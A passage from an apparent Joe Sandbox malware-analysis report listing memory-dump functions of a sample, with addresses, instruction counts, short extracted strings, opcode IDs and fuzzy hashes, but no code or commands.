                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: p'J4
                      • API String ID: 0-1549499615
                      • Opcode ID: d804e650bb9b7600acabf1f96e1cfcbeae8a2350da5ba7e4d2e3b0aac298cdfe
                      • Instruction ID: 5281ba9ef64e0066238b5a285d20f691be5523015b9d223f2fd0db343f527a8f
                      • Opcode Fuzzy Hash: d804e650bb9b7600acabf1f96e1cfcbeae8a2350da5ba7e4d2e3b0aac298cdfe
                      • Instruction Fuzzy Hash: C0316170A0D90D8FEF94DF98C499AADB7F1FF69300F11017AD409E7299EA78A8419B40
                      Function 00007FFD344A0E90 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0nV4
                      • API String ID: 0-1584648176
                      • Opcode ID: 83fc62efdd38ee5154718666bf8a0bd2641517dab651152bb51c084d1053fedd
                      • Instruction ID: 7b4d5e28948b0780c30d89a658ea6b933c19c12a90ec690644817647071c759b
                      • Opcode Fuzzy Hash: 83fc62efdd38ee5154718666bf8a0bd2641517dab651152bb51c084d1053fedd
                      • Instruction Fuzzy Hash: D0112921B1EE1E0FEBECDA1C547927A63C5EBA9255B01017FE40ED329ADD68EC0143C0
                      Function 00007FFD344A062D Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: L_^
                      • API String ID: 0-925995230
                      • Opcode ID: e759efc2f26cd2067ac5b071a0726eaa4c18781a05db6b90f1e3d772cc6eefd0
                      • Instruction ID: 7c033ebea19d2619142a9946403759ddde68085e44dc88bcee1fecfc8669249f
                      • Opcode Fuzzy Hash: e759efc2f26cd2067ac5b071a0726eaa4c18781a05db6b90f1e3d772cc6eefd0
                      • Instruction Fuzzy Hash: 3321DE3090E78A8FDB96DF2488A91AD3FB0FF66304F0A01FBC119D6193DA79A444D741
                      Function 00007FFD3449CF10 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: [#
                      • API String ID: 0-521757041
                      • Opcode ID: a67159b6e4e3e862bce0cc21f4e02d4f7dd77408c694ef9c180a6fac565db937
                      • Instruction ID: 5b6c340f898aea3d302e140aada47d1311030436b1d829dea39c2c9a692b2e16
                      • Opcode Fuzzy Hash: a67159b6e4e3e862bce0cc21f4e02d4f7dd77408c694ef9c180a6fac565db937
                      • Instruction Fuzzy Hash: 5F315E70E0851D8FEB50DFA8C4987ED77F0EB19304F01453AD11AE7289DBB8A844EB60
                      Function 00007FFD34480A01 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: v74
                      • API String ID: 0-1622749249
                      • Opcode ID: ad4bb035a6930afba5b5470d7613260b767235cddebc2e9eaae1f2171968b073
                      • Instruction ID: 9ebd01ab446314694ce68c714ccf4ad6d07992d07ab1c1f99a88da580d5c712b
                      • Opcode Fuzzy Hash: ad4bb035a6930afba5b5470d7613260b767235cddebc2e9eaae1f2171968b073
                      • Instruction Fuzzy Hash: 4F11C131E2860E4FE7D0EF6888A91FE7BE4FF6A300F4205B6D518D6096DE79A4409740
                      Function 00007FFD3448111D Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xy74
                      • API String ID: 0-3312385807
                      • Opcode ID: eb12602482b251cbab94a7b6e6c12b853ccf7703402345c2ac801125654e1907
                      • Instruction ID: b3e50fd1df4c9f80a4492d873d124c20c2387e616fc03ce4ecbfe2fa061bf8f6
                      • Opcode Fuzzy Hash: eb12602482b251cbab94a7b6e6c12b853ccf7703402345c2ac801125654e1907
                      • Instruction Fuzzy Hash: 7611D031E1864A8FEB99DB6888A82B97BE0EF1A301F4105BFD11AD61C6DA7A6440D700
                      Function 00007FFD34491CF6 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: *
                      • API String ID: 0-163128923
                      • Opcode ID: 5d86523091ed673320273b29e0698befdd1d90f94b6df8be60cafdf2795746fd
                      • Instruction ID: 184ddc774efa22653ffb842aeb9a931b51ec93ca6d44fd32a65db0cf03194ba7
                      • Opcode Fuzzy Hash: 5d86523091ed673320273b29e0698befdd1d90f94b6df8be60cafdf2795746fd
                      • Instruction Fuzzy Hash: F8110D30E0462D8BEB28DF95C8A47EDB3B2FF95301F10427AC509AB298DB785940EF40
                      Function 00007FFD344B1F45 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: !
                      • API String ID: 0-2657877971
                      • Opcode ID: 6e71f9ca774a5b2f655edf22b8bffe47e178d034a6e7dbc67a44a55507ff20ae
                      • Instruction ID: cd458d86663d7420b12b12b4fd6e54148fbf3c29ec5c8099667d98d0c0706d33
                      • Opcode Fuzzy Hash: 6e71f9ca774a5b2f655edf22b8bffe47e178d034a6e7dbc67a44a55507ff20ae
                      • Instruction Fuzzy Hash: AD119670E0522A8BEB68DF05C8A5BE9B3B1BB56301F1041FAD54DE7295CBB85E80DF44
                      Function 00007FFD34481130 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xy74
                      • API String ID: 0-3312385807
                      • Opcode ID: 99969a6e1f9b3c45f6fff737744017426b6d43a1203461f3646d63625805ae7f
                      • Instruction ID: 986b14457cc9e4ad62f5a1993ac23de4aa6c416a3e1bce65f25cf7d010c3364e
                      • Opcode Fuzzy Hash: 99969a6e1f9b3c45f6fff737744017426b6d43a1203461f3646d63625805ae7f
                      • Instruction Fuzzy Hash: 0AF02830E18A0E8AFBD49B6888A82FA77E4FF0A305F01053FD41ED21C6DFB96044D240
                      Function 00007FFD344951C8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4
                      • API String ID: 0-4088798008
                      • Opcode ID: ae06bbe1ca3ee20b2bc3fe8449ebf1492da68d964e369ec72e647aad35fd1971
                      • Instruction ID: 695c4e6a90e6e9a3a4a12874b6e7e331d43b869e41fd12ba98500d16c6423178
                      • Opcode Fuzzy Hash: ae06bbe1ca3ee20b2bc3fe8449ebf1492da68d964e369ec72e647aad35fd1971
                      • Instruction Fuzzy Hash: B1F0F932E0E6C946FB989F2458752B87BD0AF06308F1600BEE55DC2086DEBD6554D642
                      Function 00007FFD3449CF81 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: [#
                      • API String ID: 0-521757041
                      • Opcode ID: fb2b837ead2db88902eb3a24193577bda80214c7b1e48bf4663d12915a95cc94
                      • Instruction ID: 595e5cfd732165cf2c630d8d547c3ffbe1adaea21a5ca3fcb275c6662c1e77a6
                      • Opcode Fuzzy Hash: fb2b837ead2db88902eb3a24193577bda80214c7b1e48bf4663d12915a95cc94
                      • Instruction Fuzzy Hash: B0011A70E082099FDB44DF94D494AECB7B0EB15314F01813AD51AAA289DBB85908EF24
                      Function 00007FFD34491849 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: *
                      • API String ID: 0-163128923
                      • Opcode ID: 388821d234e86150c96b26558f5084ed7bc9c9068dd1516dae1f74ba1a221d35
                      • Instruction ID: 36ea7f5020fb6fe80d72915da8bc7b88fb65328af2f323f0ca5a2605be82fe58
                      • Opcode Fuzzy Hash: 388821d234e86150c96b26558f5084ed7bc9c9068dd1516dae1f74ba1a221d35
                      • Instruction Fuzzy Hash: 8FE01231A0871DCFEB18EF80C8A49ED73B2FB55340F51063AC409DB294DBB86904EB45
                      Function 00007FFD344AE61D Relevance: .8, Instructions: 774COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04342fcb29cce02df5e2ec23511108209a5e39fbf9c9c755a90a4b4c57f1bd5d
                      • Instruction ID: 00872d23ea98e10cebc21655244307b70dc1d7ae852f8a6ca523b8f0a57aee08
                      • Opcode Fuzzy Hash: 04342fcb29cce02df5e2ec23511108209a5e39fbf9c9c755a90a4b4c57f1bd5d
                      • Instruction Fuzzy Hash: 39626374E15A2D8FDBE9EB18C898BA9B7B5FB59301F5001EA910DE3291CA755AC0DF00
                      Function 00007FFD344AE665 Relevance: .6, Instructions: 609COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 65bf5b8ab360b31716c6c5d367d94118f1aa42aa5a55cf2d6b2fb2557dc1495e
                      • Instruction ID: 58b8d2b0d7ad6549b786cb2ba777783d5f956f579fd18cb5c2ea950f40b379fa
                      • Opcode Fuzzy Hash: 65bf5b8ab360b31716c6c5d367d94118f1aa42aa5a55cf2d6b2fb2557dc1495e
                      • Instruction Fuzzy Hash: A9428674E15A2D8FDBE9EB18C898BA9B7B5FB59701F1001E9D10DE3291CA756AC0DF00
                      Function 00007FFD34493EFA Relevance: .5, Instructions: 523COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9bfbc39ed902811f17acec6686db80e83fa9230813c08ad0a6d467f6b30a8ad
                      • Instruction ID: 2ae2bb9a20d5e5da3ac791ffb522993fc98e85a8e3c7e5c5ea1fc61104cc4e13
                      • Opcode Fuzzy Hash: a9bfbc39ed902811f17acec6686db80e83fa9230813c08ad0a6d467f6b30a8ad
                      • Instruction Fuzzy Hash: 4E125F71E086198FEB94EB68D8957ED77F0FF5A310F0101BAD10DE3296DE785984AB40
                      Function 00007FFD344AA143 Relevance: .4, Instructions: 394COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a576ddbd578b2dbf026bbfb9ff3c0db485ad0ad56be4d906806782d5c30c47d9
                      • Instruction ID: 83d23a0aa58e1f59acd5c3d7da4adb818a2f644532de97ddb3e7e8b7e38afa63
                      • Opcode Fuzzy Hash: a576ddbd578b2dbf026bbfb9ff3c0db485ad0ad56be4d906806782d5c30c47d9
                      • Instruction Fuzzy Hash: A7C1F331A0DA8C8FDBA5DF58D8557E9BBF0EF5A310F0002BAD04DD3192DA79A945CB81
                      Function 00007FFD344AA1AB Relevance: .4, Instructions: 361COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 48d8582914e96124ce5269b817d612108b03ea63f42e962a1c388145102492df
                      • Instruction ID: bc5b323824c77b16df106c495d2c0e5c3f3a54924d4034345a4a1fceab2d61f6
                      • Opcode Fuzzy Hash: 48d8582914e96124ce5269b817d612108b03ea63f42e962a1c388145102492df
                      • Instruction Fuzzy Hash: 32B14531A0D68C8FDBA5DB68C8567E97BF0EF5A310F0401BED049D3192DA786945CB91
                      Function 00007FFD344ADD94 Relevance: .4, Instructions: 359COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c5cddccf739ebad95285c79824dccb4641b6db349ba6e42d1ad5e5737e551a8
                      • Instruction ID: 034ed5ae4bc17f58742347a48fd1386a70625b4d3bf61d480e099b7bc69baf28
                      • Opcode Fuzzy Hash: 7c5cddccf739ebad95285c79824dccb4641b6db349ba6e42d1ad5e5737e551a8
                      • Instruction Fuzzy Hash: 09C11070E4E68D8FE791EB2888A92FA7BF1FF17310F0601BAD509C7196DA6DA405C741
                      Function 00007FFD344A0E48 Relevance: .3, Instructions: 341COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d9e5c1e3fb12e06c1ea3bdf3c56b40de0331149fc59b3b046f92bf92789d8cd4
                      • Instruction ID: fac446f6788bb9227be19f60bc353de01b2ab8acc62667edfab486791789ac8a
                      • Opcode Fuzzy Hash: d9e5c1e3fb12e06c1ea3bdf3c56b40de0331149fc59b3b046f92bf92789d8cd4
                      • Instruction Fuzzy Hash: FFA12571B1DA0A4FE798EB18D4A55B5B3E2FF69314B15017ED04EC319ADE78F8428780
                      Function 00007FFD344A2918 Relevance: .3, Instructions: 319COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 435d1a60eb731c12d9eb48cee28014986040c71d7fccf3ae5aac310ed9233a63
                      • Instruction ID: 5cc141efeb0b9fb018cbde232c3baeaf604322a6fd983905b0b7fcf9e41a7a91
                      • Opcode Fuzzy Hash: 435d1a60eb731c12d9eb48cee28014986040c71d7fccf3ae5aac310ed9233a63
                      • Instruction Fuzzy Hash: DEB14730A0A64D8FEB94EF68C4A92FD7BF0FF1A300F01417AD509E7296DA78A544DB41
                      Function 00007FFD3449DABF Relevance: .3, Instructions: 309COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf57e4e413bb3c07a9fa15b7c85fe9fcd38826997de2d438cb96c9ff26b9a156
                      • Instruction ID: 82103fabba9df8cf02b3501e8eb57e83ad53807a795b8d6158179cdab3a7abe3
                      • Opcode Fuzzy Hash: bf57e4e413bb3c07a9fa15b7c85fe9fcd38826997de2d438cb96c9ff26b9a156
                      • Instruction Fuzzy Hash: 19D19870A1852D9EEBA5EB58C8A97E9B3B1FF59300F5001F9D10DE3296CE786D819F01
                      Function 00007FFD344AA868 Relevance: .3, Instructions: 306COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 138ebe0c731a29eaa30a8421eb2b95fb5f2aa54990ae32c467e9a74c77e5d7eb
                      • Instruction ID: d9e857d2355bf1f903c536b3b49b6764421e1029b8adc627d001f9b9fa480dc9
                      • Opcode Fuzzy Hash: 138ebe0c731a29eaa30a8421eb2b95fb5f2aa54990ae32c467e9a74c77e5d7eb
                      • Instruction Fuzzy Hash: FBA1AD30A0968D8FDB95EF68C8A46ED7BF0FF5A300F0101BAD509E7192DB789985CB41
                      Function 00007FFD344AA8C0 Relevance: .3, Instructions: 301COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7f866cc895d1c70cfdccab170b29836855470217f8030c1d63ab32f332083e2
                      • Instruction ID: 49ed3e5f1458b7d10566f20b41e650eefac9d481b89c262df0be05825434e7b3
                      • Opcode Fuzzy Hash: b7f866cc895d1c70cfdccab170b29836855470217f8030c1d63ab32f332083e2
                      • Instruction Fuzzy Hash: 28A15830E09A4D8FEB94EF68C8A46ADBBF0FF59300F11057AD509E3285DA79A584CB40
                      Function 00007FFD344979C1 Relevance: .3, Instructions: 296COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0014f7da9ccf803c8affbd37d90b03323f4f8e92e0608665d963df1852c902d
                      • Instruction ID: 5d9f1eaddf8e8236851497608cd7ca30c0be71b8b2955ac862685768912d6f78
                      • Opcode Fuzzy Hash: a0014f7da9ccf803c8affbd37d90b03323f4f8e92e0608665d963df1852c902d
                      • Instruction Fuzzy Hash: 5AA1AC30E0964A8FEB55EB6488A86BE7BF0FF1A310F0105BAD509D7096DB78A544E741
                      Function 00007FFD344AC2C0 Relevance: .3, Instructions: 295COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a47caa92422b1c67b12e9f6190e8f397d07555a0a7eb6a50fcc546b3a0d00dac
                      • Instruction ID: 047bf8e42e1e7a7da2a1aa65660c0e34ed62b789faca8b70d8bf3db389d004b1
                      • Opcode Fuzzy Hash: a47caa92422b1c67b12e9f6190e8f397d07555a0a7eb6a50fcc546b3a0d00dac
                      • Instruction Fuzzy Hash: B6B1AD3090E68A8FEB86DF68C8652E97BF0EF0A300F0541BAD548D7192CA7CA945DB51
                      Function 00007FFD34496550 Relevance: .3, Instructions: 292COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 229a63d9b38fe20d86432415e65f8f40a88ffa27454abceef0417bdb6ef42bc1
                      • Instruction ID: af3a3f4785d9edda8b257943947a9cc99b76a829b47892315fad7dd21869ea5a
                      • Opcode Fuzzy Hash: 229a63d9b38fe20d86432415e65f8f40a88ffa27454abceef0417bdb6ef42bc1
                      • Instruction Fuzzy Hash: 10B14D70E086198FEBA4DB58C8A57EDB7B0FF16310F0141BAD50DD2296DF7C6984AB41
                      Function 00007FFD344A2978 Relevance: .3, Instructions: 281COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aca20454e744906a922d330eeca2a82a3f5e1b5665e0206c2c39be79a49263c7
                      • Instruction ID: 837b4eb6b588cb0b5f4a7b1d1a96ff159f2d3527cd69ff3dbb9b4a0be5a402d8
                      • Opcode Fuzzy Hash: aca20454e744906a922d330eeca2a82a3f5e1b5665e0206c2c39be79a49263c7
                      • Instruction Fuzzy Hash: 90A1A430E1968E8FEB91EB64C4A86FD7BF0FF1A300F0105BAD619D7196DA78A544CB41
                      Function 00007FFD344A2828 Relevance: .3, Instructions: 280COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9fcdbb006ab55fcfc1e0a395346863d4d158af65eb032ed2e382f3ad9896aaca
                      • Instruction ID: 6aa1cf719849449fb67d0b80f096c35a659fab0b2cea4174fbe7788634f5dd7f
                      • Opcode Fuzzy Hash: 9fcdbb006ab55fcfc1e0a395346863d4d158af65eb032ed2e382f3ad9896aaca
                      • Instruction Fuzzy Hash: 58A11730E0964E8FDB58EFA8C4A56BD7BB1FF59301F10047ED44AE6295CBB9A940CB40
                      Function 00007FFD344A24C8 Relevance: .3, Instructions: 262COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01423148a3d26573218fecadbbd0f54291ea465b5f842858ceff8b4d6323e82f
                      • Instruction ID: 43cef4bb406d00de60252329afaa54ebf540de8fa884b3d33d9451ff6c095fa9
                      • Opcode Fuzzy Hash: 01423148a3d26573218fecadbbd0f54291ea465b5f842858ceff8b4d6323e82f
                      • Instruction Fuzzy Hash: 6D91E330A0968E8FDB95EF68C8A56FD7BB0FF0A304F01057AD508C7292DB78A855DB41
                      Function 00007FFD344AD15D Relevance: .3, Instructions: 262COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26a4c45f2babc296a9eec8272efe4837d1358b00d46a653c1909b13cb1a943e9
                      • Instruction ID: c9e7a1157cfb646c563ee46d929cadabca9554b7f2bcf8432d5fe79083003ef2
                      • Opcode Fuzzy Hash: 26a4c45f2babc296a9eec8272efe4837d1358b00d46a653c1909b13cb1a943e9
                      • Instruction Fuzzy Hash: CE71F771B1AE0A4FEBE4EB18C4A4675B3E2FF69304B15017ED549C319ADE78F8428780
                      Function 00007FFD3449C0D0 Relevance: .3, Instructions: 261COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a1e8cd6f09070fc9f1e1f51eaf17c4ee9d8260954751fef668c45153934b959a
                      • Instruction ID: 75658532a3685754dbd407debacc442e80c5081696fea279dc9640dd13229345
                      • Opcode Fuzzy Hash: a1e8cd6f09070fc9f1e1f51eaf17c4ee9d8260954751fef668c45153934b959a
                      • Instruction Fuzzy Hash: A7913931A0C78A5FE3169F7898A71E97FA0FF07300F4145BAC109D60BADB396559E741
                      Function 00007FFD344A24D0 Relevance: .3, Instructions: 259COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f25ad9c3b80ddab364745ad7e53ec4b8d6c6c7463d33edd3d8de7032b0aaddb5
                      • Instruction ID: c1e240b9acaccc425cc470575975f4025b4291742d92537e51bf36379af9aea7
                      • Opcode Fuzzy Hash: f25ad9c3b80ddab364745ad7e53ec4b8d6c6c7463d33edd3d8de7032b0aaddb5
                      • Instruction Fuzzy Hash: 7F91E230A1968E8FDB95EF68C8A56ED7BB0FF0A304F01057AD508C7292DB78A855DB41
                      Function 00007FFD344AB754 Relevance: .3, Instructions: 258COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
